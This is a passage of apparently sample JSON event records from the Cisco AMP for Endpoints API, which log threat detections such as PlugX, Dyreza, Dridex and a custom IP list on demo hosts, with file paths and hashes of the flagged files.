Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841158","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55725,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841157","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55724,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841156","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55723,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":171000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333329057841154","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55721,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6180333329057841000,"timestamp":1610705264,"timestamp_nanoseconds":47000000,"date":"2021-01-15T10:07:44+00:00","event_type":"DFC Threat 
Detected","event_type_id":1090519084,"detection":"DFC.CustomIPList","detection_id":"6180333324762873857","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Upatre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e1:e5:94:ea:a5:44"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"network_info":{"remote_ip":"8.8.4.4","remote_port":443,"local_ip":"10.10.0.0","local_port":55720,"nfm":{"direction":"Outgoing connection from","protocol":"TCP"},"parent":{"process_id":3136,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b4e5c2775de098946b4e11aba138b89d42b88c1dbd4d5ec879ef6919bf018132","sha1":"8de30174cebc8732f1ba961e7d93fe5549495a80","md5":"b3581f426dc500a51091cdd5bacf0454"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":912000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960835","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\All Users\\VirusMap\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":1428,"disposition":"Clean","file_name":"mcvsmap.exe","identity":{"sha256":"ae16e10e621d6610a3f7f2c7122f9d1263700ba02d1b90e42798decb2fe84096","sha1":"9224de3af2a246011c6294f64f27206d165317ba","md5":"4e1e0b8b0673937415599bf2f24c44ad"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907656771961000,"timestamp":1610705263,"timestamp_nanoseconds":162000000,"date":"2021-01-15T10:07:43+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907656771960834","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"McUtil.DLL","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Local Settings\\Temp\\RarSFX1\\McUtil.DLL","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48","sha1":"ae0f9bf2740d00c5d485827eb32aca33feaa3a90","md5":"ad4a646b38a482cc07d5b09b4fffd3b3"},"parent":{"process_id":3596,"disposition":"Malicious","file_name":"ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6155907648182026000,"timestamp":1610705261,"timestamp_nanoseconds":724000000,"date":"2021-01-15T10:07:41+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.Trojan.PlugX.72.tht.VRT","detection_id":"6155907648182026241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Plugx","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"98:0d:93:45:27:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ps.exe","file_path":"\\\\?\\C:\\Documents and Settings\\John Smith\\Desktop\\ps.exe","identity":{"sha256":"ff4592e89b434b3fca5dabd5210d9bf17ae8c1d912c2d29007c55dbea0aa8cae","sha1":"080cf73cdd9a318f958cd5e730579d84d6a1cd26","md5":"2b88f6504fd54bbc454031f255a97cdf"},"archived_file":{"disposition":"Malicious","identity":{"sha256":"0a99238e1ebebc47d7a89b2ccddfae537479f7f77322b5d4941315d3f7e5ca48"}},"parent":{"process_id":3896,"disposition":"Clean","file_name":"iexplore.exe","identity":{"sha256":"b18a0d4beba606bf30f5010ba3c72abafac80d5f303a8bffb24d7f7b78b786e6","sha1":"eadce51c88c8261852c1903399dde742fba2061b","md5":"b60dddd2d63ce41cb8c487fcfbb6419e"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209700347052000,"timestamp":1610705254,"timestamp_nanoseconds":882000000,"date":"2021-01-15T10:07:34+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209700347052056","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256485970936000,"timestamp":1610705253,"timestamp_nanoseconds":307000000,"date":"2021-01-15T10:07:33+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256485970935854","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209670282281000,"timestamp":1610705247,"timestamp_nanoseconds":223000000,"date":"2021-01-15T10:07:27+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209670282280983","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256434431328000,"timestamp":1610705241,"timestamp_nanoseconds":295000000,"date":"2021-01-15T10:07:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256434431328301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":1489955900178000400,"timestamp":1610705238,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:07:18+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"GenericKD:Dyreza-tpd","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610705238,"start_date":"2021-01-15T10:07:18+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb"},"parent":{"disposition":"Malicious","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6156209605857772000,"timestamp":1610705232,"timestamp_nanoseconds":855000000,"date":"2021-01-15T10:07:12+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.DFC.MalParent","detection_id":"6156209605857771542","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dridex","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:8a:fc:e3:35:8c"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"4543543.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\4543543.exe","identity":{"sha256":"7c9d5724064693dfeef76fd4da8d6f159ef0e6707e67c4a692a03e94f4a6e27a","sha1":"fc5d6fc2cbb1d95864f5ed26b50e4ebe68333eab","md5":"107a3bef0da9ab2b42e3e0f9f843093b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":358000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655340","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":343000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655339","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":280000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655338","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"VyCoQwOmMNmrVgs.exe","file_path":"\\\\?\\C:\\Windows\\VyCoQwOmMNmrVgs.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":2812,"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256391481655000,"timestamp":1610705231,"timestamp_nanoseconds":249000000,"date":"2021-01-15T10:07:11+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256391481655337","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":890000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688040","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"jwenjktgenwrger234231.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\Desktop\\D94038FDE7B0F343931DF8040B\\jwenjktgenwrger234231.exe","identity":{"sha256":"7e54dceecd3d3a23a896e971ae4bb9e71a64a5c1c3b77ac1c64241c55c1b95bb","sha1":"5250d75aaa81095512c5160a8e14f941e2022ece","md5":"789b94e94c2793266fe673c578fd8c1b"},"parent":{"process_id":3652,"disposition":"Malicious","file_name":"webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":875000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176256387186688039","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"\\\\?\\C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} -{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176256387186688000,"timestamp":1610705230,"timestamp_nanoseconds":625000000,"date":"2021-01-15T10:07:10+00:00","event_type":"Threat 
